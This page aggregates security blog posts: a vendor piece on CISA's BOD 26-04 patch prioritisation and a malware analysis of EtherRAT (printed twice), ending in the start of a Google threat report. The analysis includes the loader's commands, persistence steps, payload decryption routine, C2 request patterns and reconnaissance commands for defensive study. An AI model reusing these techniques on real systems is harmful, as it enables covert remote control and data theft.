❌

Normal view

The Shift to Threat-Informed Prioritization: Operationalizing CISA BOD 26-04

Blogs

Blog

The Shift to Threat-Informed Prioritization: Operationalizing CISA BOD 26-04

In this post, we examine how CISA BOD 26-04 shifts the industry away from flat CVSS scoring and details how Flashpoint bridges the critical data gaps left by public vulnerability repositories.

SHARE THIS:
Default Author Image
June 15, 2026

With the recent issuance of Binding Operational Directive (BOD) 26-04, CISA has officially shifted federal policy away from static severity scores and flat patching timelinesΒ  toward threat-informed prioritization. The move reflects a reality security teams have grappled with for years: not all critical vulnerabilities post the same risk, and not all active vulnerabilities receive the highest CVSS scores.Β 

Traditional vulnerability management programs have often relied on severity-based patching models that force resource-constrained teams to focus on large volumes of high-scoring vulnerabilities. Yet research consistently shows that threat actors routinely exploit a broader range of weaknesses, including lower-scoring vulnerabilities on internet-facing assets, to gain initial access and move laterally through victim environments.Β 

While BOD 24-04 represents a significant step forward, there are still hidden challenges organizations will face as they adopt a risk-based approach. The operational reality is that executing a truly risk-based matrix validates what Flashpoint has maintained for years: effective vulnerability prioritization requires deep, contextual threat data. Unfortunately, the needed real-world metadata for this kind of context are simply not supported by public sources of vulnerability intelligence.

Understanding BOD 26-04

BOD 26-04 evaluates the urgency of a vulnerability by cross-referencing a security flaw against four distinct operational variables:

  1. Asset Exposure: Is the asset publicly accessible via the internet?
  2. Known Exploited Status (KEV): Is there verifiable evidence of active exploitation in the wild?
  3. Exploit Automation: Can a threat actor completely automate the weaponization and delivery of the exploit?
  4. Technical Impact: Does a successful exploit result in partial disruption or total compromise of the target system?

By analyzing these variables in tandem, organizations can tier their response and execute clear, defensible SLA metrics.

Risk PriorityReal-World Matrix ConditionsRequired SLA & Operational Action
P1: Immediate RiskIn KEV + Publicly Exposed + Automatable + Total Impact3 Days (Includes Mandatory Forensic Triage)
P2: Urgent RiskIn KEV + Publicly Exposed + (Either Non-Automatable OR Partial Impact)7 Days
P3: Elevated RiskIn KEV + Internal / Non-Publicly Exposed Asset14 Days
P4: Standard RiskNot in KEV + Publicly Exposed + Automatable + Total Impact30 Days
Deferred RiskNot in KEV + Internal Asset OR Lower Technical ImpactNext Scheduled System Upgrade / Maintenance

According to CISA, the pilot testing of this model has shown that fewer than 1% of an organization’s typical vulnerability backlog requires urgent, immediate remediation, while over 60% can be safely deferred to standard system maintenance cycles. However, implementing this framework successfully requires access to granular, real-world data points that public sources of vulnerability intelligence simply do not support.Β 

β€œSpeaking with security teams in the wake of this directive, it is clear that BOD 26-04 is a major paradigm shift. While the ability to safely defer more than half of your patch backlog is an invaluable efficiency gain for modern organizations, executing that strategy effectively requires ground-truth intelligence on exploit automation and adversary intent that public registries simply cannot deliver.”

Josh Lefkowitz, CEO and Co-founder at Flashpoint

The Data Challenge

To operationalize this model successfully, organizations will require a high-fidelity intelligence pipeline that combines comprehensive threat and vulnerability intelligence into clear, context-rich insights that support prioritization and decision making. You cannot confidently defer remediation without verifiable intelligence that proves the vulnerability lacks active exploit history or automation maturity.

Unfortunately, relying on public data feeds like the CVE database or the National Vulnerability Database (NVD) to fuel this matrix creates an immediate operational bottleneck. Public repositories have historically struggled under severe analysis backlogs, leading to processing delays and missing Common Platform Enumeration (CPE) data. Furthermore, public feeds are inherently reactive; they do not monitor illicit communities where exploit code is developed, nor do they track the real-time weaponization metrics needed to meet BOD 26-04’s tight 3-day or 7-day compliance window.

How Flashpoint Solves the Prioritization Gap

Flashpoint Vulnerability Intelligence bridges the gap between public data limitations and the requirements of real-world exposure management. Independently researched and enriched, Flashpoint provides the precise contextual signals required by the CISA BOD 26-04 matrix:

  • Coverage across CVE and non-CVE vulnerabilities
  • Continuous tracking of exploitation activity and adversary usage
  • Context on exploit maturity and remediation
  • Consistent enrichment that can be integrated into operational workflows
  • Over 7,000 known exploited vulnerabilities (KEV)

By integrating Flashpoint’s continuous intelligence into operational workflows, security teams can automatically validate exposure, assess automation potential, and confidently claim the operational relief that risk-based prioritization promises.

β€œWe are convinced by Flashpoint’s superior vulnerability coverage, timeliness in the updates, and long-term monitoring of exploits. We also really appreciate Flashpoint’s proprietary CVSS rating and classifications based on expert knowledge of the standard and practical use in the industry. Having all this curated information at your fingertips is a game changer.”

Vulnerability Manager, Telecommunications

Prioritize Vulnerability Risk Using Flashpoint

CISA’s BOD 26-04 represents a critical shift away from severity-based patching and toward defensive efficiency. However, the effectiveness of this model is entirely dependent on the fidelity of your threat data.

Without best-in-class comprehensive vulnerability intelligence, security teams will be forced back into reactive patching cycles. Request a demo to learn more how Flashpoint helps security teams move beyond the constraints of static scoring and align their vulnerability management workflows with actual risk.

See Flashpoint in Action

The post The Shift to Threat-Informed Prioritization: Operationalizing CISA BOD 26-04 appeared first on Flashpoint.

Inside aΒ malicious infrastructure deliveringΒ EtherRAT,Β phishing pages,Β and malicious softwareΒ 

15 June 2026 at 22:17

During our recent threat hunting activities, we foundΒ EtherRATΒ malware being distributed by a website with a strange homepage.Β This homepageΒ allowed us to discover a vast malicious infrastructure distributing malware,Β malicious documents,Β remote desktopΒ software,Β and phishing pages.Β 

EtherRATΒ isΒ a RATΒ developed in Node.jsΒ which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server.Β The malware uses theΒ EtheriumΒ blockchain to obtainΒ theΒ C2 server, hence the β€œEther” part of the name.Β EtherRATΒ is typically distributed via MSI,Β PowerShell, or JavaScriptΒ scripts.Β 

An open directory that distributesΒ EtherRAT: where it all beganΒ 

While threat hunting, we found an open directoryΒ that wasΒ distributingΒ MSI installersΒ and PowerShell scripts,Β whichΒ ultimately distributedΒ EtherRAT.Β In the analyzed cases, theΒ PowerShellΒ scriptsΒ and MSIΒ installersΒ were distributed from a β€œ/install” folder.Β  The versions have a progressive number, ranging from v1Β to v10.Β 

FigureΒ 1: Open Directory hostingΒ EtherRATΒ MSIΒ 
Open Directory hostingΒ EtherRATΒ MSIΒ 

TheΒ returned home page caught our attention and prompted us to further explore the campaign.Β 

The homepage returned by theΒ EtherRATΒ distribution websiteΒ 

Analyzing domains and associatedΒ IPs with theΒ EtherRATΒ distribution, we detected other similarΒ home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remoteΒ controlΒ software, and other malware.Β These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain.Β 

DifferentΒ websites thatΒ resolve toΒ the same IP addresses have previously returned pages related to fake companies or default templates. TheΒ use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers.Β  Here are some of the home pages we found:

Some of theΒ maliciousΒ websitesΒ indexed on GoogleΒ 

EtherRATΒ is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using theΒ EthereumΒ blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns.Β 

Technical analysis ofΒ EtherRATΒ 

The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on.Β 

MSI LoaderΒ 

The MSI fileΒ β€œv9.msi” containsΒ three components:Β 

MSIΒ FilenameΒ DescriptionΒ 
KmPuGimn.cmdΒ BAT launcherΒ 
cDQMlQAru0.xmlΒ First Jscript loaderΒ 
MRaQCipBIZeiZNx.logΒ EncryptedΒ EtherRATΒ 

When the MSI is executed, theΒ β€œKmPuGimn.cmd” file is started:Β 

conhostΒ --headlessΒ cmdΒ /c "KmPuGimn.cmd"Β 

This obfuscated BAT file performs different operations:Β 

  • Extracts theΒ other files in a random folder in %LOCALAPPDATA%.Β 
  • Re-executes itself via:Β 
    • %SystemRoot%\System32\conhost.exe –headless %SystemRoot%\System32\cmd.exe /c callΒ β€œC:\Users\{user}\AppData\Local\{random_path}\KmPuGimn.cmd” nKWaΒ 
  • RunsΒ the commandΒ β€œwhere node” to find an existing installation.Β 
  • Downloads Node.jsΒ if it’s not foundΒ 
    • Uses β€œcurl -sLo” to download Node.js from the official website.Β 
    • Extracts to installation directory viaΒ β€œtar -xf”.Β 
    • Renames extracted directory toΒ β€œ28Q75h”.
  • Loops until bothΒ β€œMRaQCipBIZeiZNx.log” andΒ β€œcDQMlQAru0.xml” exist, then executes:Β 
    • conhost.exe –headlessΒ C:\Users\{user}\AppData\Local\{random_path}\{random_path}\node.exeΒ cDQMlQAru0.xmlΒ 

The executed β€œcDQMlQAru0.xml” is a loader thatΒ decrypts theΒ embedded codeΒ with a XORΒ functionΒ andΒ then executesΒ it with β€œvm.compileFunction”.Β 

decrypted[i] = (encrypted[i] -Β key[iΒ %Β key.length] -Β i) & 0xFFΒ 
The embedded decrypted codeΒ 

The decrypted code:Β 

  • Copies node.exeΒ in β€œC:\Users\{user}\AppData\Local\{random_path}\{random_path}\_MJlLlt5.exe”.Β 
  • Adds a registry key for persistence with β€œconhost.exe –headless”.Β 
  • DecryptsΒ β€œMRaQCipBIZeiZNx.log” andΒ executesΒ itΒ withΒ β€œ_MJlLlt5.exe” stdin.Β 

The decryption algorithm is aΒ customΒ stream-like decoding routing based on XOR, byte rotations andΒ anΒ accumulator:Β 

for e in range(len(data)):Β 
Β Β Β Β byte = data[e]Β 
Β Β Β Β g =Β prevΒ 
Β Β Β Β prevΒ = byteΒ 
Β Β Β  byte = (byte - g) & 0xffΒ 
Β Β Β  byte = byte ^Β n[e %Β len(n)] ^ ((e >> 8) & 0xff)Β 
Β Β Β  byte =Β si[byte]Β 
Β Β Β  byte = (byte -Β k[e %Β len(k)]) & 0xff
Β Β Β Β result[e] = byteΒ 

TheΒ finalΒ stage isΒ to deploy EtherRAT.Β EtherRATΒ allows the attacker to:Β 

  • ExecuteΒ arbitraryΒ JavaScript code received by the C2 server.Β This allows the attacker to execute new commands, perform operations on files and folders,Β modifyΒ the registry, and exfiltrate data.Β 
  • Get a new C2 server using the EthereumΒ blockchain.Β 
  • ReobfuscateΒ itself.Β 
  • Save the logs to β€œsvchost.log”.Β 
Part of decryptedΒ EtherRATΒ codeΒ 

TheΒ EtherRATΒ uses Ethereum’sΒ β€œeth_call” JSON-RPC method to retrieve the active C2 URL from a smart contract on the EthereumΒ mainnet.Β Β 

TheΒ blockchainΒ parameters in this case are:Β 

  • Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58Β 
  • Function selector: 0x7d434425Β 
  • Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0Β 
The decoded C2 from Ethereum blockchainΒ 

The contacted URLs to obtain the C2 server endpointΒ are:Β 

  • mainnet[.]gateway[.]tenderly[.]coΒ 
  • rpc[.]flashbots[.]net/fastΒ 
  • rpc[.]mevblocker[.]ioΒ 
  • eth-mainnet[.]public[.]blastapi[.]ioΒ 
  • ethereum-rpc[.]publicnode[.]comΒ 
  • eth[.]drpc[.]orgΒ 
  • eth[.]merkle[.]ioΒ 

Polling requests use randomized URL patternsΒ based on some parameters defined in the code:Β 

GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id>Β 
X-Bot-Server: <c2_url>Β 

In the analyzed sample, the parameters are:Β 

  • Build ID: β€œ6f816d80-0d6c-4384-9cd6-6b79965fc08f” 
  • ext:Β randomly selected fromΒ β€œpng”,Β β€œjpg”,Β β€œgif”,Β β€œcss”,Β β€œico”,Β β€œwebp”.Β 
  • param:Β randomly selected fromΒ β€œid”,Β β€œtoken”,Β β€œkey”,Β β€œb”,Β β€œq”,Β β€œs”,Β β€œv”.Β 

After startup, the RATΒ sendsΒ its own source code toΒ the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash.Β 

POST /api/[REOBF_PATH]/<victim-uuid>Β 
Body:Β { "code": "<current_script_contents>", "build": "<build_id>" }Β 

After theΒ EtherRATΒ execution, weΒ observedΒ different post-compromisedΒ cmd.exeΒ activities to check the environment. For example:Β 

  • powershellΒ -NoProfileΒ -NonInteractiveΒ -WindowStyleΒ Hidden -Command β€œ(Get-WmiObjectΒ Win32_VideoController).Name”
  • reg query β€œHKLM\SOFTWARE\Microsoft\Cryptography” /vΒ MachineGuidΒ 
  • powershellΒ -NoProfileΒ -NonInteractiveΒ -WindowStyleΒ Hidden -Command β€œ(Get-WmiObjectΒ Win32_ComputerSystem).Domain” 
  • powershellΒ -NoProfileΒ -NonInteractiveΒ -WindowStyleΒ Hidden -Command β€œ(Get-WmiObjectΒ Win32_ComputerSystem).PartOfDomain” 
  • cmd.exe /d /s /c β€œnet session” 
EtherRATΒ logsΒ 

PowerShell LoaderΒ 

TheΒ activities performedΒ by the PowerShell loadersΒ areΒ very similarΒ toΒ the last stage of the JS script of the MSI installer:Β 

  • DownloadsΒ Node.js ifΒ it’sΒ not present.Β 
  • Create the necessary directories.Β 
  • Decode theΒ EtherRATΒ with a custom decryptionΒ algorithm.Β 
  • ExecuteΒ Node.js withΒ conhost.exeΒ and the decryptedΒ EtherRATΒ payload.Β 

We detected some variants ofΒ the PowerShell loader hostedΒ onΒ these websites; namely that the functions’ namesΒ and the decryption functionsΒ change in the analyzed PowerShell scripts.Β 

The decryption ofΒ EtherRATΒ payloadΒ with the custom decryptionΒ algorithmΒ 

Tracking theΒ malicious infrastructureΒ 

When weΒ analyzedΒ the different websites with theΒ β€œhacking-theme” pages,Β we found thatΒ in the pastΒ many had hosted multiple phishing pagesΒ in some specific paths. For example:Β 

  • /zht/sharep-redirect.htmlΒ 
  • /bl/me.phpΒ 
  • /t/teamsΒ 
  • /teams/Windows/invite.phpΒ 

It seems that these domainsΒ and IPsΒ areΒ actually partΒ of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software.Β It is possible that these infrastructures are shared by multiple threat actors who activate differentΒ URLΒ endpoints based on the specific campaign.Β 

Interestingly,Β the majority of theΒ domainsΒ related to this malicious infrastructureΒ in the past also returned an HTML page related to a β€œBulletproof Infrastructure” service.Β Β 

We found that these phishing campaigns typicallyΒ startΒ via emailsΒ with documents attached, such as PDF or ExcelΒ files.Β These documents askΒ the userΒ to click a link to view another document.Β Below are two examples of the phishing documentsΒ attached to the emails:

These phishing pages typically askΒ the userΒ to enterΒ theirΒ email address, then continue the infection chain and distribute phishing or malware pages.Β  Below are some of the phishing pages detectedΒ within the malicious infrastructure:

MisconfigurationsΒ exposed the phishing kitsΒ 

While tracking malicious websites, we found one with an open directoryΒ containingΒ part of the phishing kit used in the campaigns.Β 

Open directoryΒ hosting part of phishing kits

Β 

The open directoryΒ containedΒ several folders with codeΒ and pagesΒ relatedΒ to the phishing campaigns.Β 

Phishing kit codeΒ 

Additionally, some domains were misconfigured and allowed the download of β€œcl.zip”, whichΒ contained the source code for the β€œURLΒ Cloaker” pages.Β 

Part of β€œURLΒ Cloaker” codeΒ 

Indicators of Compromise (IOCs)β€―Β 

IPsΒ 

82[.]165[.]65[.]244: malicious infrastructureβ€―Β 

185[.]221[.]216[.]121: malicious infrastructureβ€―Β 

43[.]163[.]233[.]166: malicious infrastructureβ€―Β 

40[.]160[.]238[.]30: malicious infrastructureβ€―Β 

159[.]89[.]227[.]204: malicious infrastructureβ€―Β 

57[.]128[.]31[.]168: malicious infrastructureβ€―Β 

DomainsΒ 

ivorilla[.]cloud:β€―EtherRATβ€―distributionβ€―Β 

mx[.]nrlwz[.]com:β€―EtherRATβ€―distributionβ€―Β 

dn[.]eyqwj[.]com:β€―EtherRATβ€―distributionβ€―Β 

bi[.]mkrjcsw[.]com:β€―EtherRATβ€―distributionβ€―Β 

dorqen[.]casa:β€―EtherRATβ€―distributionβ€―Β 

kelvra[.]club:β€―EtherRATβ€―distributionβ€―Β 

cambioefectivo[.]com:β€―EtherRATβ€―C2β€―Β 

vabelles[.]com:β€―EtherRATβ€―C2β€―Β 

tranzed[.]org:β€―EtherRATβ€―C2β€―Β 

kibrisarazi[.]com:β€―EtherRATβ€―C2β€―Β 

aravisblog[.]com:β€―EtherRATβ€―C2β€―Β 

publicspeakingtip[.]org:β€―EtherRATβ€―C2β€―Β 

AcknowledgementsΒ 


Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser β†’

Inside aΒ malicious infrastructure deliveringΒ EtherRAT,Β phishing pages,Β and malicious softwareΒ 

15 June 2026 at 22:17

During our recent threat hunting activities, we foundΒ EtherRATΒ malware being distributed by a website with a strange homepage.Β This homepageΒ allowed us to discover a vast malicious infrastructure distributing malware,Β malicious documents,Β remote desktopΒ software,Β and phishing pages.Β 

EtherRATΒ isΒ a RATΒ developed in Node.jsΒ which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server.Β The malware uses theΒ EtheriumΒ blockchain to obtainΒ theΒ C2 server, hence the β€œEther” part of the name.Β EtherRATΒ is typically distributed via MSI,Β PowerShell, or JavaScriptΒ scripts.Β 

An open directory that distributesΒ EtherRAT: where it all beganΒ 

While threat hunting, we found an open directoryΒ that wasΒ distributingΒ MSI installersΒ and PowerShell scripts,Β whichΒ ultimately distributedΒ EtherRAT.Β In the analyzed cases, theΒ PowerShellΒ scriptsΒ and MSIΒ installersΒ were distributed from a β€œ/install” folder.Β  The versions have a progressive number, ranging from v1Β to v10.Β 

FigureΒ 1: Open Directory hostingΒ EtherRATΒ MSIΒ 
Open Directory hostingΒ EtherRATΒ MSIΒ 

TheΒ returned home page caught our attention and prompted us to further explore the campaign.Β 

The homepage returned by theΒ EtherRATΒ distribution websiteΒ 

Analyzing domains and associatedΒ IPs with theΒ EtherRATΒ distribution, we detected other similarΒ home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remoteΒ controlΒ software, and other malware.Β These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain.Β 

DifferentΒ websites thatΒ resolve toΒ the same IP addresses have previously returned pages related to fake companies or default templates. TheΒ use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers.Β  Here are some of the home pages we found:

Some of theΒ maliciousΒ websitesΒ indexed on GoogleΒ 

EtherRATΒ is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using theΒ EthereumΒ blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns.Β 

Technical analysis ofΒ EtherRATΒ 

The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on.Β 

MSI LoaderΒ 

The MSI fileΒ β€œv9.msi” containsΒ three components:Β 

MSIΒ FilenameΒ DescriptionΒ 
KmPuGimn.cmdΒ BAT launcherΒ 
cDQMlQAru0.xmlΒ First Jscript loaderΒ 
MRaQCipBIZeiZNx.logΒ EncryptedΒ EtherRATΒ 

When the MSI is executed, theΒ β€œKmPuGimn.cmd” file is started:Β 

conhostΒ --headlessΒ cmdΒ /c "KmPuGimn.cmd"Β 

This obfuscated BAT file performs different operations:Β 

  • Extracts theΒ other files in a random folder in %LOCALAPPDATA%.Β 
  • Re-executes itself via:Β 
    • %SystemRoot%\System32\conhost.exe –headless %SystemRoot%\System32\cmd.exe /c callΒ β€œC:\Users\{user}\AppData\Local\{random_path}\KmPuGimn.cmd” nKWaΒ 
  • RunsΒ the commandΒ β€œwhere node” to find an existing installation.Β 
  • Downloads Node.jsΒ if it’s not foundΒ 
    • Uses β€œcurl -sLo” to download Node.js from the official website.Β 
    • Extracts to installation directory viaΒ β€œtar -xf”.Β 
    • Renames extracted directory toΒ β€œ28Q75h”.
  • Loops until bothΒ β€œMRaQCipBIZeiZNx.log” andΒ β€œcDQMlQAru0.xml” exist, then executes:Β 
    • conhost.exe –headlessΒ C:\Users\{user}\AppData\Local\{random_path}\{random_path}\node.exeΒ cDQMlQAru0.xmlΒ 

The executed β€œcDQMlQAru0.xml” is a loader thatΒ decrypts theΒ embedded codeΒ with a XORΒ functionΒ andΒ then executesΒ it with β€œvm.compileFunction”.Β 

decrypted[i] = (encrypted[i] -Β key[iΒ %Β key.length] -Β i) & 0xFFΒ 
The embedded decrypted codeΒ 

The decrypted code:Β 

  • Copies node.exeΒ in β€œC:\Users\{user}\AppData\Local\{random_path}\{random_path}\_MJlLlt5.exe”.Β 
  • Adds a registry key for persistence with β€œconhost.exe –headless”.Β 
  • DecryptsΒ β€œMRaQCipBIZeiZNx.log” andΒ executesΒ itΒ withΒ β€œ_MJlLlt5.exe” stdin.Β 

The decryption algorithm is aΒ customΒ stream-like decoding routing based on XOR, byte rotations andΒ anΒ accumulator:Β 

for e in range(len(data)):Β 
Β Β Β Β byte = data[e]Β 
Β Β Β Β g =Β prevΒ 
Β Β Β Β prevΒ = byteΒ 
Β Β Β  byte = (byte - g) & 0xffΒ 
Β Β Β  byte = byte ^Β n[e %Β len(n)] ^ ((e >> 8) & 0xff)Β 
Β Β Β  byte =Β si[byte]Β 
Β Β Β  byte = (byte -Β k[e %Β len(k)]) & 0xff
Β Β Β Β result[e] = byteΒ 

TheΒ finalΒ stage isΒ to deploy EtherRAT.Β EtherRATΒ allows the attacker to:Β 

  • ExecuteΒ arbitraryΒ JavaScript code received by the C2 server.Β This allows the attacker to execute new commands, perform operations on files and folders,Β modifyΒ the registry, and exfiltrate data.Β 
  • Get a new C2 server using the EthereumΒ blockchain.Β 
  • ReobfuscateΒ itself.Β 
  • Save the logs to β€œsvchost.log”.Β 
Part of decryptedΒ EtherRATΒ codeΒ 

TheΒ EtherRATΒ uses Ethereum’sΒ β€œeth_call” JSON-RPC method to retrieve the active C2 URL from a smart contract on the EthereumΒ mainnet.Β Β 

TheΒ blockchainΒ parameters in this case are:Β 

  • Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58Β 
  • Function selector: 0x7d434425Β 
  • Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0Β 
The decoded C2 from Ethereum blockchainΒ 

The contacted URLs to obtain the C2 server endpointΒ are:Β 

  • mainnet[.]gateway[.]tenderly[.]coΒ 
  • rpc[.]flashbots[.]net/fastΒ 
  • rpc[.]mevblocker[.]ioΒ 
  • eth-mainnet[.]public[.]blastapi[.]ioΒ 
  • ethereum-rpc[.]publicnode[.]comΒ 
  • eth[.]drpc[.]orgΒ 
  • eth[.]merkle[.]ioΒ 

Polling requests use randomized URL patternsΒ based on some parameters defined in the code:Β 

GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id>Β 
X-Bot-Server: <c2_url>Β 

In the analyzed sample, the parameters are:Β 

  • Build ID: β€œ6f816d80-0d6c-4384-9cd6-6b79965fc08f” 
  • ext:Β randomly selected fromΒ β€œpng”,Β β€œjpg”,Β β€œgif”,Β β€œcss”,Β β€œico”,Β β€œwebp”.Β 
  • param:Β randomly selected fromΒ β€œid”,Β β€œtoken”,Β β€œkey”,Β β€œb”,Β β€œq”,Β β€œs”,Β β€œv”.Β 

After startup, the RATΒ sendsΒ its own source code toΒ the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash.Β 

POST /api/[REOBF_PATH]/<victim-uuid>Β 
Body:Β { "code": "<current_script_contents>", "build": "<build_id>" }Β 

After theΒ EtherRATΒ execution, weΒ observedΒ different post-compromisedΒ cmd.exeΒ activities to check the environment. For example:Β 

  • powershellΒ -NoProfileΒ -NonInteractiveΒ -WindowStyleΒ Hidden -Command β€œ(Get-WmiObjectΒ Win32_VideoController).Name”
  • reg query β€œHKLM\SOFTWARE\Microsoft\Cryptography” /vΒ MachineGuidΒ 
  • powershellΒ -NoProfileΒ -NonInteractiveΒ -WindowStyleΒ Hidden -Command β€œ(Get-WmiObjectΒ Win32_ComputerSystem).Domain” 
  • powershellΒ -NoProfileΒ -NonInteractiveΒ -WindowStyleΒ Hidden -Command β€œ(Get-WmiObjectΒ Win32_ComputerSystem).PartOfDomain” 
  • cmd.exe /d /s /c β€œnet session” 
EtherRATΒ logsΒ 

PowerShell LoaderΒ 

TheΒ activities performedΒ by the PowerShell loadersΒ areΒ very similarΒ toΒ the last stage of the JS script of the MSI installer:Β 

  • DownloadsΒ Node.js ifΒ it’sΒ not present.Β 
  • Create the necessary directories.Β 
  • Decode theΒ EtherRATΒ with a custom decryptionΒ algorithm.Β 
  • ExecuteΒ Node.js withΒ conhost.exeΒ and the decryptedΒ EtherRATΒ payload.Β 

We detected some variants ofΒ the PowerShell loader hostedΒ onΒ these websites; namely that the functions’ namesΒ and the decryption functionsΒ change in the analyzed PowerShell scripts.Β 

The decryption ofΒ EtherRATΒ payloadΒ with the custom decryptionΒ algorithmΒ 

Tracking theΒ malicious infrastructureΒ 

When weΒ analyzedΒ the different websites with theΒ β€œhacking-theme” pages,Β we found thatΒ in the pastΒ many had hosted multiple phishing pagesΒ in some specific paths. For example:Β 

  • /zht/sharep-redirect.htmlΒ 
  • /bl/me.phpΒ 
  • /t/teamsΒ 
  • /teams/Windows/invite.phpΒ 

It seems that these domainsΒ and IPsΒ areΒ actually partΒ of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software.Β It is possible that these infrastructures are shared by multiple threat actors who activate differentΒ URLΒ endpoints based on the specific campaign.Β 

Interestingly,Β the majority of theΒ domainsΒ related to this malicious infrastructureΒ in the past also returned an HTML page related to a β€œBulletproof Infrastructure” service.Β Β 

We found that these phishing campaigns typicallyΒ startΒ via emailsΒ with documents attached, such as PDF or ExcelΒ files.Β These documents askΒ the userΒ to click a link to view another document.Β Below are two examples of the phishing documentsΒ attached to the emails:

These phishing pages typically askΒ the userΒ to enterΒ theirΒ email address, then continue the infection chain and distribute phishing or malware pages.Β  Below are some of the phishing pages detectedΒ within the malicious infrastructure:

MisconfigurationsΒ exposed the phishing kitsΒ 

While tracking malicious websites, we found one with an open directoryΒ containingΒ part of the phishing kit used in the campaigns.Β 

Open directoryΒ hosting part of phishing kits

Β 

The open directoryΒ containedΒ several folders with codeΒ and pagesΒ relatedΒ to the phishing campaigns.Β 

Phishing kit codeΒ 

Additionally, some domains were misconfigured and allowed the download of β€œcl.zip”, whichΒ contained the source code for the β€œURLΒ Cloaker” pages.Β 

Part of β€œURLΒ Cloaker” codeΒ 

Indicators of Compromise (IOCs)β€―Β 

IPsΒ 

82[.]165[.]65[.]244: malicious infrastructureβ€―Β 

185[.]221[.]216[.]121: malicious infrastructureβ€―Β 

43[.]163[.]233[.]166: malicious infrastructureβ€―Β 

40[.]160[.]238[.]30: malicious infrastructureβ€―Β 

159[.]89[.]227[.]204: malicious infrastructureβ€―Β 

57[.]128[.]31[.]168: malicious infrastructureβ€―Β 

DomainsΒ 

ivorilla[.]cloud:β€―EtherRATβ€―distributionβ€―Β 

mx[.]nrlwz[.]com:β€―EtherRATβ€―distributionβ€―Β 

dn[.]eyqwj[.]com:β€―EtherRATβ€―distributionβ€―Β 

bi[.]mkrjcsw[.]com:β€―EtherRATβ€―distributionβ€―Β 

dorqen[.]casa:β€―EtherRATβ€―distributionβ€―Β 

kelvra[.]club:β€―EtherRATβ€―distributionβ€―Β 

cambioefectivo[.]com:β€―EtherRATβ€―C2β€―Β 

vabelles[.]com:β€―EtherRATβ€―C2β€―Β 

tranzed[.]org:β€―EtherRATβ€―C2β€―Β 

kibrisarazi[.]com:β€―EtherRATβ€―C2β€―Β 

aravisblog[.]com:β€―EtherRATβ€―C2β€―Β 

publicspeakingtip[.]org:β€―EtherRATβ€―C2β€―Β 

AcknowledgementsΒ 


Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser β†’

Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research

15 June 2026 at 16:00

Written by: Patrick Whitsell, John McGuiness


Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People's Republic of China (PRC)-nexus threat actor, targeting institutions in the North American academic, medical, and military research community. While remaining undetected for over a year, the threat actor compromised externally facing web applications, deployed bespoke malware, pivoted to sensitive internal systems, and abused enterprise administrative tools for covert data exfiltration. The threat actor had broad collection aspirations, including sensitive defense intelligence related to national security, Indo-Pacific command operations, artificial intelligence, uncrewed vehicle systems, cyber offensive programs, and medical research.Β 

GTIG disrupted the malicious infrastructure associated with this threat actor. Working with Mandiant Consulting, we notified the affected organizations upon detection and offered our assistance with remediation. We have updated Google Security Operations (SecOps) with relevant intelligence, enabling defenders to identify indicators of compromise (IOCs) within their networks. We encourage all users and customers to follow recommended best practices for third-party Identity Providers (IdP) and ensure 2-Step Verification (2SV) is enabled across all accounts.

Campaign Overview

The campaign targeted a diverse set of national, state, and private medical entities. These organizations comprise world-renowned clinical providers, premier academic centers, North American military health institutions, professional advocacy groups, and health regulatory bodies. Their research areas span a broad spectrum of modern medicine, from molecular discovery and clinical drug trials to state-level public health policy and military readiness. They employ thousands of people with a combined research budget in the billions of dollars.

The earliest known compromise occurred in September 2023, after which GTIG observed a consistent operational pattern. The threat actor exploited externally facing REDCap (Research Electronic Data Capture) servers and deployed custom malware named INFINITERED to capture legitimate REDCap login credentials. Then, after remaining undetected for more than a year, UNC6508 used the captured credentials to access the victim’s internal network. The threat actor was also observed using the novel technique of manipulating domain content compliance rules for data exfiltration. Lastly, UNC6508 used sophisticated operations security (OpSec) techniques to conceal and obfuscate their activity.Β 

GTIG collaborated closely with Mandiant Consulting, the FLARE team, and Workspace Security on this effort to combine our threat intelligence, incident response, and reverse engineering expertise across Google Cloud. This enabled us to develop a complete picture of the attack lifecycle from initial compromise to complete mission. GTIG also extends thanks to the affected organizations for their cooperation and the valuable post-exploitation insights they shared.

Prevention, Detection, and Remediation

GTIG recommends defenders implement the following security measures, across all Cloud enterprise platforms, to mitigate this threat:

  • Secure Admin Accounts: Enforce phishing-resistant 2-Step Verification (2SV) for enterprise administrator accounts, including through third-party Identity Providers.

  • Advanced Protection: Consider enrolling highly sensitive accounts in our Advanced Protection Program for additional safeguards against malware and phishing attacks.

